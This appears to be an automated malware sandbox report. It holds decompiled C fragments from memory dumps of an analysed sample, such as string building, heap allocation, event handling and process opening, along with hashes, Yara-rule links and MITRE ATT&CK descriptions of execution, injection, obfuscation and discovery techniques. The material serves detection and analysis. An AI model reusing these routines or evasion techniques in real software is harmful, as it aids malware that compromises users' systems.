Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: c64092d20e86620fa8264bbf99184c0b4561051fb4a06ad69723bb4acd1279ae
Instruction ID: 2ca7821fd3b4a140d9d672230f78f578a4a10962fabdcd5e64badaa5b12f167e
Opcode Fuzzy Hash: c64092d20e86620fa8264bbf99184c0b4561051fb4a06ad69723bb4acd1279ae
Instruction Fuzzy Hash: 15110672A00114AFE722DBA9DD84E9EBBEEEBE1260F0542B7F54497190E7759E00C760

Uniqueness

Uniqueness Score: -1.00%

Function 6E14F67D, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E14F6A1

Part of subcall function 6E14FDC1: __fltout2.LIBCMT ref: 6E14FDEA

__cftog_l.LIBCMT ref: 6E14F6C7
__cftoe_l.LIBCMT ref: 6E14F6F9

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 90ccb8a6d0fba13973ca5cab8f78136eab913a3a61740b1b0d0724653ad27dd6
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: A9014B3244014EFBCF025EC4CC119EE3F66BB2D255B659815FA3858230D736C5B1BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E14E274, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6E14E28B

Part of subcall function 6E14E980: ___BuildCatchObjectHelper.LIBCMT ref: 6E14E9B2
Part of subcall function 6E14E980: ___AdjustPointer.LIBCMT ref: 6E14E9C9

_UnwindNestedFrames.LIBCMT ref: 6E14E2A2
___FrameUnwindToState.LIBCMT ref: 6E14E2B4
CallCatchBlock.LIBCMT ref: 6E14E2D8

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction ID: b2ae29bcc1a372b2c78e7587a5381bd3f5c7aa4239348be374e310a5e95535cb
Opcode Fuzzy Hash: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction Fuzzy Hash: 9E01E93210010AFBDF129F95CC01EDA7FBAFF58758F114415F9186A220D772EAA1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01007FCE, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E01007FCE(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E01007D4B(_t8, _t1);
				_t16 = E010098E4(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E01001365(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E010098E4(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E01005DE8(_t16);
				}
				return _t18;
			}

0x01007fd9
0x01007fda
0x01007fdd
0x01007fdf
0x01007fea
0x01007fee
0x01007ff3
0x01007ff7
0x01007fff
0x01008004
0x0100800c
0x0100800c
0x01008015
0x01008019
0x0100801f
0x01008022
0x01008028
0x01008028
0x01008030
0x01008030
0x01008037
0x01008037
0x01008042

APIs

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

Part of subcall function 01001365: wsprintfA.USER32 ref: 010013C1

lstrlen.KERNEL32(0100197C,00000000,00000000,00000027,00000005,00000000,00000000,01008899,74666F53,00000000,0100197C,0100D00C,?,0100197C), ref: 01008004
lstrcpy.KERNEL32(00000000,00000000), ref: 01008028
lstrcat.KERNEL32(00000000,00000000), ref: 01008030

Strings

Soft, xrefs: 01007FDA, 01007FF3

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 9aeb16662c5b9dd6c95bd2935072896ff98b032d3f1c61b0aec27b3f11c03f71
Instruction ID: eae8d5e63b4a7a2386684cf7eefa72e496219d7c37f522888c67394c6af080ca
Opcode Fuzzy Hash: 9aeb16662c5b9dd6c95bd2935072896ff98b032d3f1c61b0aec27b3f11c03f71
Instruction Fuzzy Hash: 5701D632500106B7FB23BBA8DC88AEF3FACFF95285F048166F68459185DB79C641D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 010013E3, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E010013E3(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E0100975F(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x100d2a4; // 0x460a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x100e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x100e90c; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E010091D9();
					_push( &_v64);
					if( *0x100d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E010091D9();
				}
				return _t28;
			}

0x010013e3
0x010013ea
0x010013f8
0x010013fc
0x01001406
0x0100140b
0x01001410
0x01001415
0x0100141f
0x01001429
0x01001429
0x01001421
0x01001421
0x01001421
0x01001421
0x0100142f
0x01001435
0x01001436
0x01001439
0x0100143c
0x0100143f
0x01001447
0x01001450
0x01001458
0x01001458
0x0100145a
0x0100145c
0x0100145c
0x01001466

APIs

Part of subcall function 0100975F: SysAllocString.OLEAUT32(00000000), ref: 010097B9
Part of subcall function 0100975F: SysAllocString.OLEAUT32(0070006F), ref: 010097CD
Part of subcall function 0100975F: SysAllocString.OLEAUT32(00000000), ref: 010097DF

memset.NTDLL ref: 01001406
GetLastError.KERNEL32 ref: 01001452

Strings

@MxtNxt, xrefs: 01001452
<, xrefs: 01001415

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MxtNxt
API String ID: 3736384471-3662781078
Opcode ID: 0b306eb7e4ada829a893010328d853e031afcf983fbc118f4915645dd9780a8a
Instruction ID: e6d283570725ab71c18429b298df5a8f8e0c743f006f2a3b9ab35e8784da34d8
Opcode Fuzzy Hash: 0b306eb7e4ada829a893010328d853e031afcf983fbc118f4915645dd9780a8a
Instruction Fuzzy Hash: E2015631901218AFEB12EFE8D884ECE7BFCAF08744F414125F948E7251DB74D5048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E101800, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101800() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e104130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e10413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e10412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e104128 = _t5;
						 *0x6e104130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e104124 = _t6;
						if(_t6 == 0) {
							 *0x6e104124 =  *0x6e104124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E101D7A,747863F0), ref: 6E10180F
GetVersion.KERNEL32 ref: 6E10181E
GetCurrentProcessId.KERNEL32 ref: 6E10183A
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E101853

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 3d14e12fcdfc035eaaed6f87dd8dc5fb72ae830e959984212dd2980bdc59f58f
Instruction ID: bd00e6cf0869772574d663e805bfce67fcb7e7521f20d74fd3c3c7a18aef86f9
Opcode Fuzzy Hash: 3d14e12fcdfc035eaaed6f87dd8dc5fb72ae830e959984212dd2980bdc59f58f
Instruction Fuzzy Hash: 38F0A470A55B019BEF409BA96959B483BA4B72B716F20C15EE541C61C8DF7092C3BB48

Uniqueness

Uniqueness Score: -1.00%

Function 0100891E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100891E(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x01008928
0x0100892c
0x01008941
0x01008943
0x01008948
0x0100894e
0x01008950
0x01008955
0x01008960
0x01008957
0x01008957
0x01008957
0x01008955
0x0100896e

APIs

memset.NTDLL ref: 0100892C
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,747C81D0), ref: 01008941
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 0100894E
CloseHandle.KERNEL32(?), ref: 01008960

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 61fbbfa180c1b13512f804ae0fff773d1fa60cbea7ff9edf47d2a8ab2006e99c
Instruction ID: 9d7c6590cf5899ec4b64e40a5079323c1a8218903f711313611de17bbeacda09
Opcode Fuzzy Hash: 61fbbfa180c1b13512f804ae0fff773d1fa60cbea7ff9edf47d2a8ab2006e99c
Instruction Fuzzy Hash: 04F0B4B15043087FE3216F25DCC0C2BBBDCEB52198F118A6EF18691141D632A8148B60

Uniqueness

Uniqueness Score: -1.00%

Function 0100149B, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100149B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x100d26c; // 0x2d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x100d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x100d26c; // 0x2d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x100d238; // 0x5220000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x0100149b
0x010014a2
0x010014ec
0x010014ee
0x010014ee
0x010014a6
0x010014ac
0x010014b1
0x010014b5
0x010014bb
0x010014c2
0x00000000
0x00000000
0x010014c4
0x010014c9
0x00000000
0x00000000
0x00000000
0x010014c9
0x010014cb
0x010014d3
0x010014d6
0x010014d6
0x010014dc
0x010014e3
0x010014e6
0x010014e6
0x00000000

APIs

SetEvent.KERNEL32(000002D0,00000001,01005C35), ref: 010014A6
SleepEx.KERNEL32(00000064,00000001), ref: 010014B5
CloseHandle.KERNEL32(000002D0), ref: 010014D6
HeapDestroy.KERNEL32(05220000), ref: 010014E6

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 7557b09337e53cefc3eb5d3dd09f1f9d006fa6f42ac3efad367df8e5c5652218
Instruction ID: b383bfa52d922bd5c5b08a7fc8deeba3c81223619581fd798ea0b6bd299f35a7
Opcode Fuzzy Hash: 7557b09337e53cefc3eb5d3dd09f1f9d006fa6f42ac3efad367df8e5c5652218
Instruction Fuzzy Hash: A5F0127560131197FB72ABB9A988A023FE8AB15771F054390B984D72D8CF39C440D760

Uniqueness

Uniqueness Score: -1.00%

Function 01006108, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01006108(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E010098E4(_t2);
				if(_t34 != 0) {
					_t30 = E010098E4(_t28);
					if(_t30 == 0) {
						E01005DE8(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0100A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0100A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x01006108
0x01006112
0x01006114
0x0100611a
0x0100611a
0x01006123
0x01006127
0x01006133
0x01006137
0x010061ab
0x01006139
0x01006139
0x0100613d
0x01006142
0x01006147
0x01006161
0x01006150
0x01006150
0x01006154
0x01006157
0x0100615c
0x0100615c
0x01006166
0x0100618e
0x01006194
0x01006197
0x01006168
0x0100616a
0x01006172
0x0100617d
0x01006182
0x01006182
0x0100619e
0x010061a5
0x010061a6
0x010061a6
0x01006137
0x010061b6

APIs

lstrlen.KERNEL32(00000000,00000008,?,74784D40,?,?,0100A2F8,?,?,?,?,00000102,010015D7,?,?,00000000), ref: 01006114

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

Part of subcall function 0100A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,01006142,00000000,00000001,00000001,?,?,0100A2F8,?,?,?,?,00000102), ref: 0100A8E0
Part of subcall function 0100A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0100A2F8,?,?,?,?,00000102,010015D7,?,?,00000000,00000000), ref: 0100A8EA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0100A2F8,?,?,?,?,00000102,010015D7,?), ref: 01006172
lstrcpy.KERNEL32(00000000,00000000), ref: 01006182
lstrcpy.KERNEL32(00000000,00000000), ref: 0100618E

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 164fe58d91014af3b55f3011b553006bf1da48eb344941b17fb6c6cd79f3e09f
Instruction ID: 0e3bcdc532b511cc342a5e0c558d957fd2f3ebb05fe4876dde4344e0dccf0485
Opcode Fuzzy Hash: 164fe58d91014af3b55f3011b553006bf1da48eb344941b17fb6c6cd79f3e09f
Instruction Fuzzy Hash: 9721C331504256FBEB13AF78CC54ADF7FE9AF16244F088091F9849B282D736DA11C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01005115, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01005115(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E010098E4(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x0100512a
0x0100512e
0x01005138
0x0100513d
0x01005142
0x01005144
0x0100514c
0x01005151
0x0100515f
0x01005164
0x0100516e

APIs

lstrlenW.KERNEL32(004F0053,?,74785520,00000008,0561937C,?,0100876F,004F0053,0561937C,?,?,?,?,?,?,0100780E), ref: 01005125
lstrlenW.KERNEL32(0100876F,?,0100876F,004F0053,0561937C,?,?,?,?,?,?,0100780E), ref: 0100512C

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

memcpy.NTDLL(00000000,004F0053,747869A0,?,?,0100876F,004F0053,0561937C,?,?,?,?,?,?,0100780E), ref: 0100514C
memcpy.NTDLL(747869A0,0100876F,00000002,00000000,004F0053,747869A0,?,?,0100876F,004F0053,0561937C), ref: 0100515F

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 1d84deacd1991463148568dd2606b00bad7d94947f652abb786564a195a8988c
Instruction ID: 733e5ef330fc402ac4fa9ae74c33ed61504eb6c391b765d1f4b3f60153212135
Opcode Fuzzy Hash: 1d84deacd1991463148568dd2606b00bad7d94947f652abb786564a195a8988c
Instruction Fuzzy Hash: 36F04F76900119BBDF12EFA8CC44CCF7BACEF09258B054062FA08D7211E671EA14DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100A755, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05619908,00000000,00000000,770CC740,01006053,00000000), ref: 0100A765
lstrlen.KERNEL32(?), ref: 0100A76D

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

lstrcpy.KERNEL32(00000000,05619908), ref: 0100A781
lstrcat.KERNEL32(00000000,?), ref: 0100A78C

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: b13a150cf5425c821611491bfe17f550a1d525f16a9509842433aa68cefa8706
Instruction ID: a189e869ea2f7e9bc2ca8aef0200d71be5fc68d487abb8ff71f17b8eab185601
Opcode Fuzzy Hash: b13a150cf5425c821611491bfe17f550a1d525f16a9509842433aa68cefa8706
Instruction Fuzzy Hash: 1FE09233901221A79723ABE8AD48CABBBACFF9A751F044556F644D3114C72A9901CBE0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

